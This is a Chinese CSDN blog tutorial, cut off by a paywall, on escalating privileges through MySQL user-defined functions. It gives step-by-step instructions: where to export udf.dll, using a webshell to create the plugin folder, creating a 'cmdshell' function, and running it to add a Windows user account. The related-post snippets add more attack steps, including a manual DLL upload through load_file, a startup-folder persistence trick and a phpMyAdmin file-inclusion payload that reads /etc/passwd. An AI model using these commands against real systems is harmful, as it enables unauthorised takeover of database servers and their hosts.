mysql 5.5 udf_MYSQL5漏洞之udf提权

最新推荐文章于 2021-10-05 09:37:25 发布
最新推荐文章于 2021-10-05 09:37:25 发布
阅读量346 收藏
点赞数
文章标签: mysql 5.5 udf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28702613/article/details/113203179
版权

一、适用条件

1.目标系统是Windows(Win2000,XP,Win2003);

2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。

3.有root账号密码

二、导出udf

MYSQL 5.1以下版本导出路径:

C:Winntudf.dll 2000

C:Windowsudf.dll 2003(有的系统被转义,需要改为C:Windowsudf.dll)

导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题)

MYSQL

5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的libplugin文件夹下才能创建自定义函数

可以再mysql里输入

select @@basedir

show variables like

‘%plugins%’ 寻找mysql安装路径

该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建libplugin文件夹,然后将udf.dll文件导出到该目录即可。

三、提权

使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一)returns

string soname ‘导出的DLL路径’;

create function cmdshell returns string soname ‘udf.dll’

select cmdshell(‘net user arsch arsch /add’);

s

最低0.47元/天 解锁文章
硅谷IT胖子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql导出udf失败_mysql UDF提权踩坑经验分享
weixin_31733409的博客
02-08 310
UDF提权已经不是什么新鲜技术了,不过前段时间在搭靶场的时候又重温了一遍这个东西,期间遇到了个别之前没有注意过的“难题”今天跟大家分享一下。首先关注一下这个版本问题,大多数人会把mysql5.1带入写到文章里面,但实际上这个年代用5.1版本mysql的人已经是万里挑一的概率了,所以这次也是针对5.1以上版本来讲的。 因为我们的mysql在导入我们的udf文件的时候是从mysql安装目录下的lib/...
Linux提权—服务漏洞,以MySQL-UDF提权为例,2024年最新2024-2024阿里巴巴网络安全面试真题解析
最新发布
2301_77118221的博客
04-15 270
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。,大家跟着这个大的方向学习准没问题。
mysql 5.5 udf提权_MySQL_UDF提权
weixin_31548723的博客
01-27 649
大三就快结束啦,也要轮到我找工作啦,结合网上的资料和自己的经验准备了一些材料,算是对自己技术方面的小小总结吧。趁这个机会查缺补漏做一些原来知道但没有动手试过的实验。一、原理udf 即 user defined function,文件后缀为.dll。通过在 udf 文件中定义新函数,可以对 mysql 的功能进行扩充,利用 mysql 账号 root 权限创建可以执行系统命令函数的 udf.dll ...
mysql导出udf失败_mysql udf提权失败的另一种方法
weixin_39533659的博客
01-19 147
实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在"C:\\Documents and Settings\\All Users\\StartMenu\\Programs\\Startup"1、连接到对方MYSQL 服务器mysql -u root ...
udf手动导出提权
weixin_30826095的博客
01-02 176
当默认udf导出失败时,可以尝试用手动方法导出udf进行提权,具体方法如下:先上传udf.dll,连接到mysql,再按下面步骤执行sql语句。 createtablezz(abclongblob);//注意列类型为longblobinsertintozzvalues(load_file('c:/tmp/cmd.txt'));//上传的udf.dll路径selectabc...
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
MySQL UDF(User Defined Function)是MySQL数据库系统中的一种扩展机制,允许用户自定义函数以满足特定的计算或处理需求。这些自定义函数通常用C或C++编写,然后编译为动态链接库(DLL),供MySQL服务器调用。本...
lib_mysqludf_sys 的win版本dll库
12-01
"lib_mysqludf_sys 的win版本dll库"这一标题明确指出,我们正在讨论的是一个专为Windows操作系统设计的动态链接库(Dynamic Link Library, DLL)文件,名为lib_mysqludf_sys。DLL是Windows系统中用于封装可重用代码...
lib_mysqludf_sys
12-22
MySQL系统命令UDF——lib_mysqludf_sys详解》 MySQL是一种广泛使用的开源关系型数据库管理系统,其功能强大,灵活性高。在实际应用中,有时我们需要执行一些操作系统级别的任务,如读取或写入文件、执行系统命令...
mysql_udf_redis.tar.bz2
04-26
mysql_udf_redis,将数据库中的数据同步到Redis。Redis中的数据变化同步到数据库,那么这里是将Redis做为db,而真的db,数据库只作为备份
Fluent-UDF常见问题解析
04-03
搜集了FLUENT-UDF使用过程中常见的一些问题,对初学者有一定帮助
mysql udf.dll(UDF)漏洞修补
surpaimb的专栏
12-12 1221
下面的内容保存为一个BAT文件,下载附件,将附件里的XCACLS.vbs文件和BAT文件放在一个目录下,双击执行BAT文件。  程序代码 net stop mysql del %SystemRoot%system32udf.dll /A/F/Q del %SystemRoot%udf.dll /A/F/Q del %SystemRoot% empudf.dll /A/F/Q dir %System
mysql exploit_MySQL 5.X exploit
weixin_31134719的博客
01-21 85
/* ****************************************************************MySQL_Exploit.cExp [-s socket]|[-h host][-p port]][-x]*****************************************************************/#include #inc...
Mysql数据库——UDF提权
梦想不是挂在嘴边炫耀的空气,而是需要认真实践,等到对的风,就展翅翱翔!
10-05 579
Mysq数据库——UDF提权     在mysql数据库中,函数分为两类,普通函数,无需外部插件支持;用户自定义函数(UDF),需要外部文件支持,例如dll文件(windows系统)或者so文件(linux系统)。 ​    UDF(user defined function)用户自定义函数,是mysql的一个拓展接口,用户可以通过自定义函数,实现在mysql无法顺利实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。 ​    本blog主要分析的是windows下的mysql UD
mysql 5.5 udf_mysql5.1 udf提权
weixin_39616003的博客
01-19 230
今儿遇见一个站,支持aspx,但是不定全满,找不到SA,逼迫使用udf提权,但是提权过程里面遇见了一些问题可以导出然后就去执行神马create function cmdshell returns string soname 'c:\windows\udf.dll'可是悲剧就来了请检查SQL语句Create Function cmdshell returns string soname 'C:\\W...
mysql-udf-http问题
啥也不是
10-20 1342
最近在使用mysql-udf-http设置触发器并发布http消息时,遇到一个问题:http服务端每次都会收到2条消息,开始以为是发布消息的方式有问题,测试以后发现没有错,然后想到可能是触发器重复,最后一看果然是之前的触发器没有删除,又定义了新的触发器,所以2个触发器都执行了。备注:每次定义新的触发器之前一定要看看有没有重复的旧的触发器,先要删除!!!
mysql5.5.53 cve,phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞分析
weixin_39664995的博客
03-23 365
前言影响版本:4.8.0——4.8.1本次复现使用4.8.1 点击下载复现平台为vulhub。此漏洞复现平台如何安装使用不在赘述。请自行百度。漏洞复现 漏洞环境启动成功。访问该漏洞地址: 使用payload:http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 包含成功...
lib_mysqludf_sys_x64.dll
08-06
lib_mysqludf_sys_x64.dll是一个用于MySQL数据库的外部库文件。它是MySQL User-defined Function (UDF)的一部分,允许用户通过调用这个库文件中的函数来扩展MySQL服务器的功能。 lib_mysqludf_sys_x64.dll提供了一些操作系统级别的功能,例如文件和目录操作、执行外部命令和程序、读取系统环境变量等。通过在MySQL中创建自定义函数并使用这个库文件,用户可以在数据库中执行许多与操作系统相关的任务。 这个库文件是为64位系统编译的,所以只能在64位的MySQL服务器上使用。使用之前,需要将它加载到MySQL服务器中,并确保服务器和客户端的版本兼容性。 加载lib_mysqludf_sys_x64.dll的方法是通过在MySQL的配置文件中添加一行配置信息,指定库文件的路径。然后,重启MySQL服务器以使配置生效。 一旦加载成功,用户就可以在自己的数据库中创建自定义函数,通过调用这个库文件中的函数来实现特定的操作系统级别的功能。比如,可以创建一个函数来执行一个外部命令,然后将结果存储到数据库中。这样,用户就可以在数据库中操作文件、目录和其他操作系统资源。 总的来说,lib_mysqludf_sys_x64.dll是一个用于MySQL数据库的外部库文件,它扩展了MySQL服务器的功能,允许用户在数据库中执行一些操作系统级别的任务。它通过创建自定义函数并使用库文件中的函数来实现这些功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值